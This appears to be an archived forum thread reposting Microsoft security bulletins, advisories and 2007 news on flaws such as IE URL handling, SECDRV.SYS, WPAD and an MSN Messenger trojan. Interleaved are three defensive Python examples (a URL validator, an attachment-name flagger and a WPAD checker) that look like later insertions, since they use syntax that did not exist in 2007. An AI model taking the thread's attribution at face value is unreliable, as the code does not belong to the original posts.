Old MS Alerts

AplusWebMaster
2005-11-25, 19:47
FYI...good reason to be "selective" when doing "Windows Updates"...

- http://support.microsoft.com/?kbid=890830
Last Review: November 24, 2005
Revision: 15.2
"...Known issues in the November 8, 2005 release
When you run the November 8, 2005 release of the Windows Malicious Software Removal Tool from Windows Update, from Automatic Update, or from the Download Center, the tool may appear to stop responding. Additionally, you may experience one of the following symptoms:
• When you run the tool from Windows Update or from Automatic Update, Windows Task Manager shows that the Iexplore.exe process has high CPU usage.
• When you run the tool from the Download Center, Windows Task Manager shows that the Mrt.exe process has high CPU usage.
To resolve this issue, install the updated version of the Windows Malicious Software Removal Tool that is now available from Windows Update, from Microsoft Update, from Automatic Updates, or from the Download Center. An updated version of the Windows Malicious Software Removal Tool was released on November 11, 2005.
>>> http://tinyurl.com/83c52

:(

AplusWebMaster
2007-07-05, 23:20
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx
Published: July 5, 2007
...This is an advance notification of -six- security bulletins that Microsoft is intending to release on July 10, 2007...

Critical (3)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Office, Excel...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: .NET Framework...


Important (2)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Office, Publisher...

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Windows XP Professional...


Moderate (1)

Microsoft Security Bulletin 3
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure ...
Affected Software: Windows Vista..."


.

AplusWebMaster
2007-08-09, 21:19
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-aug.mspx
Published: August 9, 2007
"...This is an advance notification of -nine- security bulletins that Microsoft is intending to release on August 14, 2007...

Critical (6)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, XML Core Services...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Visual Basic, Office for Mac...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 9
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...


Important (3)

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows Vista...

Microsoft Security Bulletin 8
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Virtual PC, Virtual Server...


.

AplusWebMaster
2007-09-06, 23:12
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-sep.mspx
Published: September 6, 2007

"This is an advance notification of five security bulletins that Microsoft is intending to release on September 11, 2007...

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows.

Important (4)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Visual Studio.

Microsoft Security Bulletin 3
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows Services for UNIX, Subsystem for UNIX-based Applications.

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: MSN Messenger, Windows Live Messenger.

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, SharePoint Server.
-----------------------------------------------

- http://www.microsoft.com/technet/security/bulletin/ms07-sep.mspx
Revisions:
• September 7, 2007: Bulletin Advance Notification updated. Microsoft plans to release four security bulletins, and no longer plans to release Microsoft Security Bulletin 5 affecting Windows and SharePoint Server, on Tuesday, September 11, 2007.

.

AplusWebMaster
2007-10-05, 13:29
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
October 4, 2007
"...This bulletin advance notification will be replaced with the October bulletin summary on October 9, 2007...

Critical (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


Important (3)

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, Office..."


.

AplusWebMaster
2007-10-10, 01:38
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
Published: October 9, 2007
"This bulletin summary lists security bulletins released for October 2007...


Critical (4)

Microsoft Security Bulletin MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution (923810)
- http://www.microsoft.com/technet/security/bulletin/ms07-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows...

Microsoft Security Bulletin MS07-056
Security Update for Outlook Express and Windows Mail (941202)
- http://www.microsoft.com/technet/security/bulletin/ms07-056.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS07-057
Cumulative Security Update for Internet Explorer (939653)
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution (942695)
- http://www.microsoft.com/technet/security/bulletin/ms07-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Office...


Important (2)

Microsoft Security Bulletin MS07-058
Vulnerability in RPC Could Allow Denial of Service (933729)
- http://www.microsoft.com/technet/security/bulletin/ms07-058.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service
Affected Software: Windows...

Microsoft Security Bulletin MS07-059
Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site (942017)
- http://www.microsoft.com/technet/security/bulletin/ms07-059.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Windows, Office...

------------------------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3480

==========================================

- http://blogs.technet.com/msrc/archive/2007/10/09/october-2007-monthly-release.aspx
"...Microsoft also re-released bulletin MS05-004*. This re-release updates detection to include Server 2003 Service Pack 2 and Vista as affected platforms. There were no changes to the update binaries, so if you have already successfully installed this update, you do not need to reinstall it..."

Microsoft Security Bulletin MS05-004
ASP.NET Path Validation Vulnerability (887219)
* http://www.microsoft.com/technet/security/Bulletin/MS05-004.mspx
Revisions:
• V1.0 (February 8, 2005): Bulletin published
• V1.1 (February 15, 2005): Bulletin updated to include Knowledge Base Article numbers for each individual download under Affected Products.
• V1.2 (March 16, 2005): Bulletin “Caveats” section has been updated to document known issues that customers may experience when installing the available security updates.
• V2.0 (June 14, 2005): Bulletin updated to announce the availability of an updated package for .NET Framework 1.0 Service Pack 3 for the following operating system versions: (887998) Windows XP Tablet PC Edition and Windows XP Media Center Edition.
• V3.0 (August 8, 2006): Bulletin updated to reflect the addition of Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 x64 Edition for .NET Framework 1.1 Service Pack 1 under “Affected Software” for “Microsoft .NET Framework 1.1”.
• V4.0 (October 9, 2007): Bulletin updated as Windows Server 2003 Service Pack 2 and Windows Vista have been added to the “Affected Software” sections for .NET Framework 1.0 Service Pack 3 KB886906 and .NET Framework 1.1 Service Pack 1 KB886903.

.

AplusWebMaster
2007-10-12, 01:31
FYI...

Microsoft Security Advisory (943521)
URL Handling Vulnerability in Windows XP and Windows Server 2003 with Windows Internet Explorer 7 Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/943521.mspx
Published: October 10, 2007
"Microsoft is investigating public reports of a remote code execution vulnerability in supported editions of Windows XP and Windows Server 2003 with Windows Internet Explorer 7 installed. We are not aware of attacks that try to use the reported vulnerability or of customer impact at this time. Microsoft is investigating the public reports.
• This vulnerability does not affect Windows Vista or any supported editions of Windows where Internet Explorer 7 is not installed..."

MSRC blog
> http://preview.tinyurl.com/yoadp8
October 10, 2007
--------------------

> http://www.microsoft.com/technet/security/advisory/943521.mspx
Updated: November 13, 2007 - "...We have issued MS07-061* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/MS07-061.mspx

.

AplusWebMaster
2007-10-12, 01:32
FYI...

- http://preview.tinyurl.com/2q4xop
October 11, 2007 (Computerworld) - Security researchers spotted an attack yesterday that exploits a vulnerability in Microsoft Word patched just the day before. On Wednesday, Symantec Corp. reported it had obtained a suspicious Word document that crashed every version of the application except the newest, Word 2007, when opened. After it examined the document, Symantec found that the document included shell code and three pieces of malware. Among its more surprising findings: Symantec found that the document had been created with the edition of Word included with Office for Mac 2004. On Tuesday, Microsoft Corp. issued a patch that closed a critical vulnerability in multiple editions of the popular word processor, including Word 2000, Word XP and Word for the Mac. Symantec put the two together. "Taking a closer look at that vulnerability, we confirmed that this document was in fact exploiting the same vulnerability"... Updates to the Windows versions of Word can be obtained via Microsoft Update or Office Update..."

- http://preview.tinyurl.com/2saysc
October 10, 2007 (Symantec Security Response Weblog)

> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3899

> http://cwe.mitre.org/data/definitions/94.html

:fear:

AplusWebMaster
2007-10-26, 15:36
FYI...

- http://preview.tinyurl.com/27znt2
October 16, 2007 (Computerworld) - "For the second time in a month, Microsoft Corp. has had to defend Windows Update against charges that it upgraded machines without users' permission. So far, it has no explanation for the newest instance of unauthorized updating..."

- https://windowssecrets.com/2007/10/25/03-PC-rebooting-The-cause-may-be-MS-OneCare
October 25, 2007 - "...My finding is that Windows Live OneCare silently changes the AU settings. This explains at least some of the complaints that have been reported so far. Users could have installed OneCare — even a free-trial version — at any time in the recent past and been unaware of any changes until Automatic Updates forced a reboot in the wee hours..."

- http://support.microsoft.com/kb/943144/en-us
Last Review: October 26, 2007
Revision: 2.2

AplusWebMaster
2007-10-26, 15:48
FYI...

URL Update to IE URL Handling Vuln
- http://isc.sans.org/diary.php?storyid=3547
Last Updated: 2007-10-26 02:05:06 UTC - "Earlier this month, Microsoft published KB943521. This article acknowledged that third party software had to validate URLs before passing them to Internet Explorer, as Internet Explorer will not validate them. Today, Microsoft published an update to the advisory, suggesting limited exploitation of this vulnerability.
Microsoft does not appear to plan to fix the issue in Internet Explorer. Instead, it asks vendors releasing tools that pass URLs to Internet Explorer to validate them...

Links:

http://www.microsoft.com/technet/security/advisory/943521.mspx
Revisions:
• October 10, 2007: Advisory published
• October 25, 2007: Advisory updated to reflect increased threat level

http://blogs.technet.com/msrc/archive/2007/10/25/msrc-blog-october-25th-update-to-security-advisory-943521.aspx"

.
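The ISC note above turns on one point: software that passes a URL to another program is expected to validate it first. The following is an added example, written for this thread and not taken from Microsoft, ISC or any product, of what such a pre-handoff check can look like in Python. The allow-listed schemes, the length limit and the function name `validate_url` are assumptions for illustration; a real application would tune them to what it actually needs to open.

```python
import re
from urllib.parse import urlsplit

# Schemes this (hypothetical) application is willing to hand to the browser.
ALLOWED_SCHEMES = {"http", "https"}

# Characters RFC 3986 permits in a URI once it has been percent-encoded.
_URI_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")
# A '%' that is not followed by two hex digits is malformed encoding.
_BAD_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")


def validate_url(url: str, max_len: int = 2048):
    """Decide whether *url* is safe to pass on to an external URL handler.

    Returns (True, "ok") or (False, reason).  The caller must refuse to
    launch the handler whenever the first element is False.
    """
    if not url or len(url) > max_len:
        return False, "empty or too long"
    # Reject anything outside the URI character set before parsing: spaces,
    # control characters and quotes are never part of a valid URL.
    if not _URI_CHARS.match(url):
        return False, "character outside the RFC 3986 URI set"
    if _BAD_PERCENT.search(url):
        return False, "malformed percent-encoding"
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. an unbalanced IPv6 bracket
        return False, f"unparseable: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    if not parts.hostname:
        return False, "missing host"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs, not taken from any real incident.
    for sample in ("http://example.com/path?q=1", "mailto:someone@example.com",
                   "http://example.com/a b", "http://example.com/%zz", "http://[bad"):
        print(sample, "->", validate_url(sample))
```

The order of the checks matters: the character-set and percent-encoding tests run on the raw string before any parser sees it, so a URL that a lenient parser would silently "repair" is rejected rather than normalised into something different from what the user saw.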

AplusWebMaster
2007-10-29, 23:40
FYI...

- http://preview.tinyurl.com/ysz6so
October 29, 2007 - (Infoworld) "A hacker has released attack code that could be used to exploit a critical bug in some versions of the Windows operating system. Microsoft patched the flaw, which affects older versions of Windows, on Oct. 9. When the Image Viewer tries to open a maliciously encoded TIFF file, it can be tricked into running unauthorized software on the PC. A sample of the exploit was posted Monday to the Milw0rm Web site. The code has not yet been used in online attacks, according to Symantec, which issued an alert Monday. Symantec recommends that Windows users install the MS07-055 update* as quickly as possible. Microsoft took the unusual step of issuing its own security update for Kodak's software, because the image viewer (formerly known as the Wang Image Viewer) had shipped in Windows 2000 systems by default. Still, many Windows users are not affected by the problem. Windows XP and Windows Server 2003 users should not have the software installed on their PCs, unless they downloaded it directly or upgraded from Windows 2000. Windows Vista users are not affected by the bug. Also, users would have to open the TIFF file using the Kodak Image Viewer for the attack to work..."

* http://forums.spybot.info/showpost.php?p=125886&postcount=17

:fear:

AplusWebMaster
2007-11-06, 15:06
FYI...

Microsoft Security Advisory (944653)
Vulnerability in Macrovision SECDRV.SYS Driver on Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/944653.mspx
November 5, 2007 - "Microsoft is working with Macrovision, investigating new public reports of a vulnerability in the Macrovision secdrv.sys driver on supported editions of Windows Server 2003 and Windows XP. This vulnerability does not affect Windows Vista. We are aware of limited attacks that try to use the reported vulnerability. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This will include providing a security update through our monthly release process..."

> http://www.macrovision.com/promolanding/7352.htm

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5587

:fear:

FYI...

Follow-up on Macrovision Secdrv exploit
- http://www.symantec.com/enterprise/security_response/weblog/2007/11/followup_on_macrovision_secdrv.html
November 6, 2007 - "...Microsoft posted Microsoft Security Advisory (944653) about this issue. With the release of this advisory, I’d like to answer a few follow-up questions for blog readers:
Q: I don’t play games and I don’t use Macrovision software, so am I safe?
A: No. The vulnerable component affected by the bug is the Macrovision driver SECDRV.SYS, which is shipped by default with Windows systems. It is usually installed under the %System%\drivers folder.
Q: Is Windows Vista affected by this vulnerability?
A: Vista is not affected. Only SECDRV versions shipped with Windows XP and 2003 are. Instead the version shipped with Vista is a completely different driver, reworked and not vulnerable to this attack. All users should keep in mind that, in a multi-layered defense perspective, it is possible that malware dropped on the system via some other exploit (e.g. browser vulnerability or the recent PDF exploit) could potentially take advantage of the SECDRV bug to take further control of the computer and bypass other layers of protection.
Q: Where is the patch?
A: Macrovision released a version of the driver today (almost identical to the one shipped with Vista) that fixes this problem. The update is available here:
http://www.macrovision.com/promolanding/7352.htm
It’s not clear at the moment if Microsoft will distribute this update with the next cycle of Windows Update."

- http://www.microsoft.com/technet/security/advisory/944653.mspx
Revisions:
• November 05, 2007: Advisory published
• November 07, 2007: Advisory revised to include identified workarounds for this vulnerability and additional information on what is secdrv.sys.

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-nov.mspx
November 13, 2007
"...The security bulletins for this month are as follows, in order of severity:

Critical (1)

Microsoft Security Bulletin MS07-061
Vulnerability in Windows URI Handling Could Allow Remote Code Execution (943460)
- http://www.microsoft.com/technet/security/bulletin/MS07-061.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin MS07-062
Vulnerability in DNS Could Allow Spoofing (941672)
- http://www.microsoft.com/technet/security/bulletin/MS07-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...
------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3642
Last Updated: 2007-11-13 18:47:44 UTC

.

FYI...

- http://www.eweek.com/article2/0,1759,2218894,00.asp?kc=EWRSS03119TX1K0000594
November 18, 2007 - "An MSN Messenger Trojan is growing a botnet by hundreds of infected PCs per hour, adding VMs to the mix as well... The malware is being introduced by MSN Messenger files posing as pictures, mostly seeming to come from known acquaintances. The files are a new type of Trojan that has snared several thousand PCs for a bot network within hours of its launch earlier on Nov. 18 and is being used to discover virtual PCs as a means of increasing its growth vector. The eSafe CSRT (Content Security Response Team) at Aladdin — a security company — detected the new threat propagating around noon EST on Nov. 18. At 18:00 UTC (Coordinated Universal Time), eSafe had detected 1 operator and more than 500 on-command bots in the network. Less than three hours later, or by 2:30 EST, when eWEEK spoke with Roei Lichtman, eSafe director of product management, the number had soared to several thousand PCs and was growing by several hundred systems per hour. eSafe is monitoring the IRC channel used to control the botnet. The only inhabitants of the network besides the operator are in fact infected PCs. The Trojan is an IRC bot that's spreading through MSN Messenger by sending itself in a .zip file with two names. One of the names includes the word "pics" as a double extension executable — a name generally used by scanners and digital cameras: for example, DSC00432.jpg.exe. The Trojan is also contained in a .zip file with the name "images" as a .pif executable—for example, IMG34814.pif... Given the familiar social engineering aspect of the attack, individuals are being urged to not open files sent unexpectedly from either friends or strangers..."

- http://www.us-cert.gov/current/#msn_messenger_trojan
November 19, 2007 - "...The Trojan arrives as a chat message that appears to contain an image file, that when opened, downloads and installs an Internet Relay Chat Bot. These messages may appear to come from a known contact..."

:fear:
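The eWEEK report above describes two lure patterns: a double-extension name such as `DSC00432.jpg.exe`, and a camera-style name with a `.pif` extension such as `IMG34814.pif`. Below is an added example, not from the article or from eSafe, of how a mail or IM gateway could flag archive entries that match those patterns before a user ever sees them. The extension lists, the camera-stem regex and the function names are assumptions chosen for illustration; the sample file names are constructed to mirror the two forms quoted in the article.

```python
import re

# Extensions Windows executes when the file is opened (assumed, non-exhaustive).
EXECUTABLE_EXTS = {"exe", "pif", "scr", "com", "bat", "cmd", "vbs", "js"}
# Image extensions typically used as the decoy in a double-extension name.
DECOY_IMAGE_EXTS = {"jpg", "jpeg", "gif", "png", "bmp", "tif", "tiff"}
# Stems that look like a camera or scanner assigned them (DSC00432, IMG34814).
CAMERA_STEM = re.compile(r"^(dsc|dscn|img|pict|p)\d{3,}$", re.IGNORECASE)


def classify_attachment(filename):
    """Return a short reason if *filename* matches an executable lure, else None."""
    # Look only at the final path component of an archive entry.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None
    stem, inner, ext = parts[0], parts[1:-1], parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return None
    decoys = [e for e in inner if e in DECOY_IMAGE_EXTS]
    if decoys:
        # e.g. DSC00432.jpg.exe -> the real extension is hidden behind .jpg
        return "image double extension ." + ".".join(decoys) + " hiding ." + ext
    if CAMERA_STEM.match(stem):
        # e.g. IMG34814.pif -> camera-style name but an executable type
        return "camera-style name with executable extension ." + ext
    return "executable attachment ." + ext


def scan_archive_listing(names):
    """Map each suspicious entry in an archive listing to the reason it was flagged."""
    findings = {}
    for n in names:
        reason = classify_attachment(n)
        if reason:
            findings[n] = reason
    return findings


if __name__ == "__main__":
    # Constructed listing resembling the "pics" / "images" zips in the article.
    sample = ["pics/DSC00432.jpg.exe", "images/IMG34814.pif", "holiday.jpg", "readme.txt"]
    for entry, why in scan_archive_listing(sample).items():
        print(f"{entry}: {why}")
```

Because the decision is made on the file name alone, this check is cheap enough to run on every attachment and catches the lure regardless of whether the binary inside is yet recognised by signature scanners, which the article notes was not the case at the time.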

FYI...

- http://preview.tinyurl.com/2sezx7
November 21, 2007 (Computerworld) - "Windows XP, Microsoft Corp.'s most popular operating system, sports the same encryption flaws that Israeli researchers recently disclosed in Windows 2000, Microsoft officials confirmed late Tuesday... As recently as last Friday, Microsoft hedged in answering questions about whether XP and Vista could be attacked in the same way, saying only that later versions of Windows "contain various changes and enhancements to the random number generator." Yesterday, however, Microsoft responded to further questions and acknowledged that Windows XP is vulnerable to the complex attack that Pinkas, Gutterman and Dorrendorf laid out in their paper, which was published earlier this month. Windows Vista, Windows Server 2003 and the not-yet-released Windows Server 2008, however, apparently use a modified or different random number generator; Microsoft said they were immune to the attack strategy. In addition, Microsoft said Windows XP Service Pack 3 (SP3), a major update expected sometime in the first half of 2008, includes fixes that address the random number generator problem... Because the company has determined that the PRNG problem is not a security vulnerability, it is unlikely to provide a patch."

:fear:

FYI...

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
December 3, 2007 - "Microsoft is investigating new public reports of a vulnerability in the way Windows resolves hostnames that do not include a fully-qualified domain name (FQDN). The technology that the vulnerability affects is Web Proxy Auto-Discovery (WPAD). Microsoft has not received any information to indicate that this vulnerability has been publicly used to attack customers, and Microsoft is not aware of any customer impact at this time. Microsoft is aggressively investigating the public reports. Customers whose domain name begins in a third-level or deeper domain, such as “contoso.co.us”, or for whom the following mitigating factors do not apply, are at risk from this vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers...
Mitigating Factors:
• Customers who do not have a primary DNS suffix configured on their system are not affected by this vulnerability. In most cases, home users that are not members of a domain have no primary DNS suffix configured. Connection-specific DNS suffixes may be provided by some Internet Service Providers (ISPs), and these configurations are not affected by this vulnerability.
• Customers whose DNS domain name is registered as a second-level domain (SLD) below a top-level domain (TLD) are not affected by this vulnerability. Customers whose DNS suffixes reflect this registration would not be affected by this vulnerability. An example of a customer who is not affected is contoso.com or fabrikam.gov, where “contoso” and “fabrikam” are customer registered SLDs under their respective “.com” and “.gov” TLDs.
• Customers who have specified a proxy server via DHCP server settings or DNS are not affected by this vulnerability.
• Customers who have a trusted WPAD server in their organization are not affected by this vulnerability. (See the Workaround section for specific steps in creating a WPAD.DAT file on a WPAD server.)
• Customers who have manually specified a proxy server in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.
• Customers who have disabled 'Automatically Detect Settings' in Internet Explorer are not at risk from this vulnerability when using Internet Explorer..."

- http://secunia.com/advisories/27901/
"...WPAD feature resolves "wpad" hostnames up to the second-level domain, which is potentially untrusted. This can be exploited to conduct man-in-the-middle attacks against third-level or deeper domains..."

:fear:
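The advisory and the Secunia note above say that WPAD discovery walks the primary DNS suffix upward and resolves "wpad" hostnames down to the second-level domain, which is why a suffix such as contoso.co.us is exposed while contoso.com is not. The following is an added example, not from Microsoft or Secunia, that models that devolution as the quoted text describes it and applies the listed mitigating factors, so an administrator can see which WPAD names a given suffix would cause clients to look up and which of them fall outside the organization's own registered domain. The function names, the keyword arguments and the sample suffixes are assumptions for illustration.

```python
def wpad_candidates(primary_dns_suffix):
    """Return the WPAD hostnames that suffix devolution would try, most specific first.

    Models the behaviour as described in advisory 945713 / Secunia 27901: every
    parent of the primary DNS suffix is tried, stopping at the second-level domain.
    """
    labels = [l for l in primary_dns_suffix.strip().strip(".").lower().split(".") if l]
    if len(labels) < 2:
        # No primary suffix (typical home PC) -> no WPAD lookups, per the advisory.
        return []
    return ["wpad." + ".".join(labels[i:]) for i in range(len(labels) - 1)]


def untrusted_wpad_candidates(primary_dns_suffix, registered_domain):
    """Candidates whose zone lies outside the domain the organization registered."""
    reg = registered_domain.strip().strip(".").lower()
    untrusted = []
    for host in wpad_candidates(primary_dns_suffix):
        zone = host[len("wpad."):]
        if zone != reg and not zone.endswith("." + reg):
            untrusted.append(host)
    return untrusted


def assess_wpad_exposure(primary_dns_suffix, registered_domain, *,
                         auto_detect_enabled=True,
                         proxy_set_by_dhcp_or_manual=False,
                         trusted_wpad_server=False):
    """Apply the advisory's mitigating factors; return (at_risk, explanation)."""
    if not auto_detect_enabled:
        return False, "'Automatically Detect Settings' is disabled"
    if proxy_set_by_dhcp_or_manual:
        return False, "proxy supplied by DHCP or configured manually"
    if trusted_wpad_server:
        return False, "organization operates its own WPAD server"
    outside = untrusted_wpad_candidates(primary_dns_suffix, registered_domain)
    if not outside:
        return False, "devolution stays within the registered domain"
    return True, "devolution can reach " + ", ".join(outside)


if __name__ == "__main__":
    # Constructed suffixes, mirroring the advisory's contoso.co.us / contoso.com examples.
    for suffix, reg in (("corp.contoso.co.us", "contoso.co.us"), ("contoso.com", "contoso.com")):
        print(suffix, wpad_candidates(suffix), assess_wpad_exposure(suffix, reg))
```

Running it for corp.contoso.co.us shows that the last name tried, wpad.co.us, sits under a registry-controlled suffix rather than under the organization, which is exactly the case the advisory flags; for contoso.com devolution never leaves the registered domain.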

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-dec.mspx
Published: December 11, 2007
Version: 1.0
"This bulletin summary lists security bulletins released for December 2007..."

Critical (3)

Microsoft Security Bulletin MS07-064
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/MS07-064.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, DirectX, DirectShow...

Microsoft Security Bulletin MS07-068
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
- http://www.microsoft.com/technet/security/bulletin/MS07-068.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Windows Media Format Runtime...

Microsoft Security Bulletin MS07-069
Cumulative Security Update for Internet Explorer (942615)
- http://www.microsoft.com/technet/security/bulletin/MS07-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...


Important (4)

Microsoft Security Bulletin MS07-063
Vulnerability in SMBv2 Could Allow Remote Code Execution (942624)
- http://www.microsoft.com/technet/security/bulletin/MS07-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS07-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (937894)
- http://www.microsoft.com/technet/security/bulletin/MS07-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS07-066
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078)
- http://www.microsoft.com/technet/security/bulletin/MS07-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows...

Microsoft Security Bulletin MS07-067
Vulnerability in Macrovision Driver Could Allow Local Elevation of Privilege (944653)
- http://www.microsoft.com/technet/security/bulletin/MS07-067.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows..."

===================================

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3735
Last Updated: 2007-12-11 19:14:09 UTC

===================================

- http://blog.washingtonpost.com/securityfix/2007/12/microsoft_plugs_11_windows_sec.html
December 11, 2007 - "...December's seven update bundles includes fixes for four separate security holes in Internet Explorer 6 and IE7, vulnerabilities that are considered critical for Windows 2000, Windows XP and Windows Vista users. Microsoft rates a flaw "critical" if it can be exploited to break into vulnerable systems with little or no help from the user, save perhaps for browsing a Web site or by clicking on a malicious link in an e-mail or instant message. The IE patch is probably the most important update Redmond issued this month, as the vulnerabilities it corrects have the potential to affect the largest number of people. Microsoft said that criminals already exploited one of the IE flaws to remotely compromise IE users. Microsoft also issued critical updates to fix at least two different problems with the way Windows handles the processing and display of various video and audio files..."

:santa:

AplusWebMaster
2007-11-08, 22:10
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-nov.mspx
Published: November 8, 2007
"This is an advance notification of two security bulletins that Microsoft is intending to release on November 13, 2007...

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...

Other Information:

Microsoft Windows Malicious Software Removal Tool
- Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.
